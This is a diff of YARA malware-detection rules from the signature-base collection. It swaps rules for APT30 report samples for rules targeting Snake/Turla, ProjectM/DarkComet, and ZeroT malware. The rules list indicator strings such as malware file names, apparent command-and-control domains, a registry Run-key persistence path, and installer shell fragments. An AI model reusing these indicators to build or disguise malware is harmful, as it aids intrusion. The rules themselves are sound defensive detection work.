 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "35dfb55f419f476a54241f46e624a1a4"
-		hash2 = "4fffcbdd4804f6952e0daf2d67507946"
-		hash3 = "597805832d45d522c4882f21db800ecf"
-		hash4 = "6bd422d56e85024e67cc12207e330984"
-		hash5 = "82e13f3031130bd9d567c46a9c71ef2b"
-		hash6 = "b79d87ff6de654130da95c73f66c15fa"
+		hash1 = "33c657fa27b92cfcced66b331cfea7a880460a98cf037e4277faa1420fe59d1c"
+		hash2 = "9b834e8f9d117bf2c564a37434973dc0717270ebfac8d8251711905d18da3858"
+		hash3 = "5ef707ea68a9bd3a3e568793a0f7d66d166694801ada067d9ebac1d13e53153e"
+		hash4 = "df12afa691e529f01c75b3dd734f6b45bf1488dbf90ced218657f0d205bff319"
 
 	strings:
-		$s0 = "Windows Security Service Feedback" fullword wide
-		$s1 = "wssfmgr.exe" fullword wide
-		$s2 = "\\rb.htm" ascii
-		$s3 = "rb.htm" fullword ascii
-		$s4 = "cook5" ascii
-		$s5 = "5, 4, 2600, 0" fullword wide
+		$s1 = "WinDivertDllEntry" fullword ascii
+		$s2 = "WinDivertHelperParseIPv4Address" fullword ascii
+		$s3 = "WinDivert (web: http://reqrypt.org/windivert.html)" fullword wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_27 : FILE
+rule SIGNATURE_BASE_Snaketurla_Malware_May17_1 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Snake / Turla Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "22815745-086f-59ee-aac1-f35e49aa5835"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L727-L746"
+		id = "ddbbd602-b7f0-5e14-be0f-0c84bb22ddeb"
+		date = "2017-05-04"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/QaOh4V"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snaketurla_osx.yar#L11-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "959573261ca1d7e5ddcd19447475b2139ca24fe1"
-		logic_hash = "5ef0661c5c04f0f0923548509363971011194a16e4308fcfdea5db90e85518a4"
+		logic_hash = "12b18c9e03f1a471541de2fb3ecc6b90a13910ca299a9b7d2bad9dd11f881506"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5b7792a16c6b7978fca389882c6aeeb2c792352076bf6a064e7b8b90eace8060"
 
 	strings:
-		$s0 = "Mozilla/4.0" fullword ascii
-		$s1 = "dizhi.gif" fullword ascii
-		$s5 = "oftHaveAck+" ascii
-		$s10 = "HlobalAl" fullword ascii
-		$s13 = "$NtRND1$" fullword ascii
-		$s14 = "_NStartup" ascii
-		$s16 = "GXSYSTEM" fullword ascii
+		$s1 = "/Users/vlad/Desktop/install/install/" ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0xfacf and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_28 : FILE
+rule SIGNATURE_BASE_Snaketurla_Malware_May17_2 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Snake / Turla Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1bc8c68f-ebbb-58b1-92aa-5954318096a0"
-		date = "2015-04-13"
+		id = "b3e94016-591c-5e39-b5e7-328e0761e535"
+		date = "2017-05-04"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L748-L776"
+		reference = "https://goo.gl/QaOh4V"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snaketurla_osx.yar#L27-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d246a188ad9ec69948bef6018bab1e7a244c76dcf511c3f9d16024ef7e369ae2"
+		logic_hash = "35bd8650afbc515ecd1cef393fd75f9b77a1e31111612227f0f4557fe8b312a7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e62a63307deead5c9fcca6b9a2d51fb0"
-		hash2 = "5b590798da581c894d8a87964763aa8b"
+		hash1 = "b8ee4556dc09b28826359b98343a4e00680971a6f8c6602747bd5d723d26eaea"
 
 	strings:
-		$s0 = "www.flyeagles.com" fullword ascii
-		$s1 = "iexplore.exe" fullword ascii
-		$s2 = "www.km-nyc.com" fullword ascii
-		$s3 = "cmdLine.exe" fullword ascii
-		$s4 = "Software\\Microsoft\\CurrentNetInf" fullword ascii
-		$s5 = "/dizhi.gif" ascii
-		$s6 = "/connect.gif" ascii
-		$s7 = "USBTest.sys" fullword ascii
-		$s8 = "/ver.htm" fullword ascii
-		$s11 = "\\netscv.exe" ascii
-		$s12 = "/app.htm" fullword ascii
-		$s13 = "\\netsvc.exe" ascii
-		$s14 = "/exe.htm" fullword ascii
-		$s18 = "MicrosoftHaveAck" fullword ascii
-		$s19 = "MicrosoftHaveExit" fullword ascii
+		$s1 = "b_openssl: oops - number of mutexes is 0" fullword ascii
+		$s2 = "networksetup -get%sproxy Ethernet" fullword ascii
+		$s3 = "012A04DECBC441e49C527B2798F54CA7LOG_NAMED_PIPE_NAME" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and 7 of them
+		( uint16( 0 ) == 0xfacf and filesize < 6000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_29 : FILE
+rule SIGNATURE_BASE_Snaketurla_Malware_May17_4 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Snake / Turla Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24334885-fcb4-5a13-82e8-c8465f97361e"
-		date = "2015-04-13"
+		id = "797dedd6-a13e-529f-bae4-4043294672c4"
+		date = "2017-05-04"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L778-L798"
+		reference = "https://goo.gl/QaOh4V"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snaketurla_osx.yar#L44-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "44492c53715d7c79895904543843a321491cb23a"
-		logic_hash = "7a59118ba00413961e6fc4d54680373d033a38d698613f853f67137b85c123a7"
+		logic_hash = "7b6aac2313ea7dae572114e92ad0b5437c5be2542853de3b184bef780faee68b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d5ea79632a1a67abbf9fb1c2813b899c90a5fb9442966ed4f530e92715087ee2"
 
 	strings:
-		$s0 = "LSSAS.exe" fullword ascii
-		$s1 = "Software\\Microsoft\\FlashDiskInf" fullword ascii
-		$s2 = ".petite" fullword ascii
-		$s3 = "MicrosoftFlashExit" fullword ascii
-		$s4 = "MicrosoftFlashHaveExit" fullword ascii
-		$s5 = "MicrosoftFlashHaveAck" fullword ascii
-		$s6 = "\\driver32" ascii
-		$s7 = "MicrosoftFlashZJ" fullword ascii
+		$s1 = "Install Adobe Flash Player.app/com.adobe.updatePK" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x4b50 and filesize < 5000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_30 : FILE
+rule SIGNATURE_BASE_Snaketurla_Installd_SH : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Snake / Turla Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "787b288a-6fb4-5483-af76-933651ec6d58"
-		date = "2015-04-13"
+		id = "65a97c0d-5c69-5e58-9a18-10e5684bc218"
+		date = "2017-05-04"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L800-L817"
+		reference = "https://goo.gl/QaOh4V"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snaketurla_osx.yar#L59-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3b684fa40b4f096e99fbf535962c7da5cf0b4528"
-		logic_hash = "5ecfc8d53b768f624c8765f70708bfaae5396d7aa6b0335f7c656f4350649c5d"
+		logic_hash = "5b16107434951ddb212996909d53dfbcdae74ed13df6690ce3f6c74258ab4670"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)" fullword wide
-		$s3 = "RnhwtxtkyLRRMf{jJ}ny" fullword ascii
-		$s4 = "RnhwtxtkyLRRJ}ny" fullword ascii
-		$s5 = "ZRLDownloadToFileA" fullword ascii
-		$s9 = "5.1.2600.2180" fullword wide
+		$s1 = "PIDS=`ps cax | grep installdp" ascii
+		$s2 = "${SCRIPT_DIR}/installdp ${FILE}" ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x2123 and filesize < 20KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_31 : FILE
+rule SIGNATURE_BASE_Snaketurla_Install_SH : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Snake / Turla Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9333870b-7eaa-54dd-a801-7292708fb592"
-		date = "2015-04-13"
+		id = "68775c54-46f8-5d44-ba63-6726d2bb8016"
+		date = "2017-05-04"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L819-L836"
+		reference = "https://goo.gl/QaOh4V"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snaketurla_osx.yar#L74-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8b4271167655787be1988574446125eae5043aca"
-		logic_hash = "003bfa9774d3e85829cc266d06417b86287986994995adfa7a2bd26c3648c07e"
+		logic_hash = "019d20ca6632759cf01962d336c22831edc64b6927d8b27d026b76eb118fce02"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\ZJRsv.tem" ascii
-		$s1 = "forceguest" fullword ascii
-		$s4 = "\\$NtUninstallKB570317$" ascii
-		$s8 = "[Can'tGetIP]" fullword ascii
-		$s14 = "QWERTY:,`/" fullword ascii
+		$s1 = "${TARGET_PATH}/installd.sh" ascii
+		$s2 = "$TARGET_PATH2/com.adobe.update.plist" ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x2123 and filesize < 20KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_J : FILE
+rule SIGNATURE_BASE_Projectm_Darkcomet_1 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects ProjectM Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "64a5106e-d7f3-5c68-a14e-410149a1bb9e"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L838-L869"
+		id = "6de74d73-f9b2-5e7f-b15e-f850425d849c"
+		date = "2016-03-26"
+		modified = "2023-01-27"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/03/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_m.yar#L10-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7c404689b60fe493ca9b503902173ac04d7bb00488edec9e69006e6d51e20c51"
+		hash = "cc488690ce442e9f98bac651218f4075ca36c355d8cd83f7a9f5230970d24157"
+		logic_hash = "81ffaa382bb6f817fe2917a096a3eee49d2e8c281271da551ccd65679692712f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "49aca228674651cba776be727bdb7e60"
-		hash2 = "5c7a6b3d1b85fad17333e02608844703"
-		hash3 = "649fa64127fef1305ba141dd58fb83a5"
-		hash4 = "9982fd829c0048c8f89620691316763a"
-		hash5 = "baff5262ae01a9217b10fcd5dad9d1d5"
-		hash6 = "9982fd829c0048c8f89620691316763a"
 
 	strings:
-		$s0 = "Launcher.EXE" fullword wide
-		$s1 = "Symantec Security Technologies" fullword wide
-		$s2 = "\\Symantec LiveUpdate.lnk" ascii
-		$s3 = "Symantec Service Framework" fullword wide
-		$s4 = "\\ccSvcHst.exe" ascii
-		$s5 = "\\wssfmgr.exe" ascii
-		$s6 = "Symantec Corporation" fullword wide
-		$s7 = "\\5.1.0.29" ascii
-		$s8 = "\\Engine" ascii
-		$s9 = "Copyright (C) 2000-2010 Symantec Corporation. All rights reserved." fullword wide
-		$s10 = "Symantec LiveUpdate" fullword ascii
-		$s11 = "\\Norton360" ascii
-		$s15 = "BinRes" fullword ascii
-		$s16 = "\\readme.lz" ascii
+		$x1 = "DarkO\\_2" fullword ascii
+		$a1 = "AVICAP32.DLL" fullword ascii
+		$a2 = "IDispatch4" fullword ascii
+		$a3 = "FLOOD/" fullword ascii
+		$a4 = "T<-/HTTP://" ascii
+		$a5 = "infoes" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT30_Microfost : FILE
+rule SIGNATURE_BASE_Projectm_Crimsondownloader : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects ProjectM Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "19231001-1da3-5be6-8275-03c9fc7c6377"
-		date = "2015-04-13"
+		id = "2e0658c9-a93d-5eef-93a2-eb1ab29acaee"
+		date = "2016-03-26"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L871-L885"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/03/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_m.yar#L32-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "57169cb4b8ef7a0d7ebd7aa039d1a1efd6eb639e"
-		logic_hash = "1fe5be3a88859fd3d485adfba92cf117afedc739bd0a46c039124919c3b81361"
+		hash = "dc8bd60695070152c94cbeb5f61eca6e4309b8966f1aa9fdc2dd0ab754ad3e4c"
+		logic_hash = "3c9a4f5aca4c9fc26d371027a32e349a456ef25d6b403a66b9afb1ee19dd4d00"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Copyright (c) 2007 Microfost All Rights Reserved" fullword wide
-		$s2 = "Microfost" fullword wide
+		$x1 = "E:\\Projects\\m_project\\main\\mj shoaib"
+		$s1 = "\\obj\\x86\\Debug\\secure_scan.pdb" ascii
+		$s2 = "secure_scan.exe" fullword wide
+		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|mswall" fullword wide
+		$s4 = "secure_scan|mswall" fullword wide
+		$s5 = "[Microsoft-Security-Essentials]" fullword wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_K : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_1 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "49629825-4233-5d74-b763-b2500536eb90"
-		date = "2015-04-03"
-		modified = "2023-01-06"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L887-L917"
+		id = "c16f3abb-ac7e-5d5f-b8d7-b105cff3886e"
+		date = "2017-02-03"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L11-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "142bc01ad412799a7f9ffed994069fecbd5a2f93"
-		logic_hash = "eed03bb4290eef0ad1cf362a157923aa1fb8faa9305b5aaba3563d0a4e65e1a5"
+		logic_hash = "ad3018e6aa377b5032b04226ecb1e27b2cc7bc8294455ea51e426b5182ed7821"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "09061c603a32ac99b664f7434febfc8c1f9fd7b6469be289bb130a635a6c47c0"
 
 	strings:
-		$x1 = "Maybe a Encrypted Flash" fullword ascii
-		$s0 = "C:\\Program Files\\Common Files\\System\\wab32" fullword ascii
-		$s1 = "\\TEMP\\" ascii
-		$s2 = "\\Temporary Internet Files\\" ascii
-		$s5 = "%s Size:%u Bytes" fullword ascii
-		$s7 = "$.DATA$" fullword ascii
-		$s10 = "? Size:%u By s" fullword ascii
-		$s12 = "Maybe a Encrypted Flash" fullword ascii
-		$s14 = "Name:%-32s" fullword ascii
-		$s15 = "NickName:%-32s" fullword ascii
-		$s19 = "Email:%-32s" fullword ascii
-		$s21 = "C:\\Prog" ascii
-		$s22 = "$LDDATA$" ascii
-		$s31 = "Copy File %s OK!" fullword ascii
-		$s32 = "%s Space:%uM,FreeSpace:%uM" fullword ascii
-		$s34 = "open=%s" fullword ascii
+		$s1 = "suprise.exe" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and ( all of ( $x* ) and 3 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_33 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_2 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "be6afc4a-97fe-56ba-b057-e21415f9833d"
-		date = "2015-04-13"
+		id = "8433216e-1189-568c-bd18-051fb1fec215"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L919-L939"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L26-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "72c568ee2dd75406858c0294ccfcf86ad0e390e4"
-		logic_hash = "295c2d9fcf1c3bab54650fd1d203dfb8c12269945aad8927066ef6f815abea69"
+		logic_hash = "e31ade3690938fe0999423fbe446d9426e14abd01ebbada4eed8bddb1e2c9ea6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "74eb592ef7f5967b14794acdc916686e061a43169f06e5be4dca70811b9815df"
 
 	strings:
-		$s0 = "Version 4.7.3001" fullword wide
-		$s1 = "msmsgr.exe" fullword wide
-		$s2 = "MYUSER32.dll" fullword ascii
-		$s3 = "MYADVAPI32.dll" fullword ascii
-		$s4 = "CeleWare.NET1" fullword ascii
-		$s6 = "MYMSVCRT.dll" fullword ascii
-		$s7 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the" wide
-		$s8 = "WWW.CeleWare.NET1" ascii
+		$s1 = "NO2-2016101902.exe" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and 6 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_34 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_3 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a4802e13-4151-5f17-ba91-dcf9ef6b52bb"
-		date = "2015-04-13"
+		id = "99aa29cf-d962-5a3d-bd28-6486c40822bb"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L941-L960"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L41-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "216868edbcdd067bd2a9cce4f132d33ba9c0d818"
-		logic_hash = "2406f9613585669f88c389ea9729a089f6aef13fba46d60b713f51cd3a946b5d"
+		logic_hash = "6920febf177667610e3edb8ba88ec137d085a867c1d6a570d4785fcc9cc62d49"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ee2e2937128dac91a11e9bf55babc1a8387eb16cebe676142c885b2fc18669b2"
 
 	strings:
-		$s0 = "dizhi.gif" ascii
-		$s1 = "eagles.vip.nse" ascii
-		$s4 = "o%S:S0" ascii
-		$s5 = "la/4.0" ascii
-		$s6 = "s#!<4!2>s02==<'s1" ascii
-		$s7 = "HlobalAl" ascii
-		$s9 = "vcMicrosoftHaveAck7" ascii
+		$s1 = "/svchost.exe" fullword ascii
+		$s2 = "RasTls.dll" fullword ascii
+		$s3 = "20160620.htm" fullword ascii
+		$s4 = "* $l&$" fullword ascii
+		$s5 = "dfjhmh" fullword ascii
+		$s6 = "/20160620.htm" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_35 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_4 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8a30720b-06da-5a82-8bab-bf06121afd68"
-		date = "2015-04-13"
+		id = "b21961ee-d346-51d3-bacd-02554240162d"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L962-L977"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L61-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "df48a7cd6c4a8f78f5847bad3776abc0458499a6"
-		logic_hash = "a70d9471215ddcfe84a39b33f53c4114b205aa2cc95cd93081afe442ee2b8b42"
+		logic_hash = "8011497e7d061a9ebde06667e47b5cd9469a433e0be1401d70637e7ace8e8155"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a9519d2624a842d2c9060b64bb78ee1c400fea9e43d4436371a67cbf90e611b8"
 
 	strings:
-		$s0 = "WhBoyIEXPLORE.EXE.exe" fullword ascii
-		$s5 = "Startup>A" fullword ascii
-		$s18 = "olhelp32Snapshot" fullword ascii
+		$s1 = "Mcutil.dll" fullword ascii
+		$s2 = "mcut.exe" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_1 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_5 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
+		id = "2a7c6a36-aace-562e-bbc4-425c1d93fab1"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L979-L996"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L77-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8cea83299af8f5ec6c278247e649c9d91d4cf3bc"
-		logic_hash = "5f20b60b8721d62731708630a3443741c956304c553f651572282336995f6d4f"
+		logic_hash = "fbc1a2e078cfae7a9c72612b9c769e84d8c1d59c89e05001571ad00071e38577"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "74dd52aeac83cc01c348528a9bcb20bbc34622b156f40654153e41817083ba1d"
 
 	strings:
-		$s0 = "#hostid" fullword ascii
-		$s1 = "\\Windows\\C" ascii
-		$s5 = "TimUmove" fullword ascii
-		$s6 = "Moziea/4.0 (c" fullword ascii
-		$s7 = "StartupNA" fullword ascii
+		$x1 = "dbozcb" fullword ascii
+		$s1 = "nflogger.dll" fullword ascii
+		$s2 = "/svchost.exe" fullword ascii
+		$s3 = "1207.htm" fullword ascii
+		$s4 = "/1207.htm" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 1 of ( $x* ) and 1 of ( $s* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_1 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_6 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
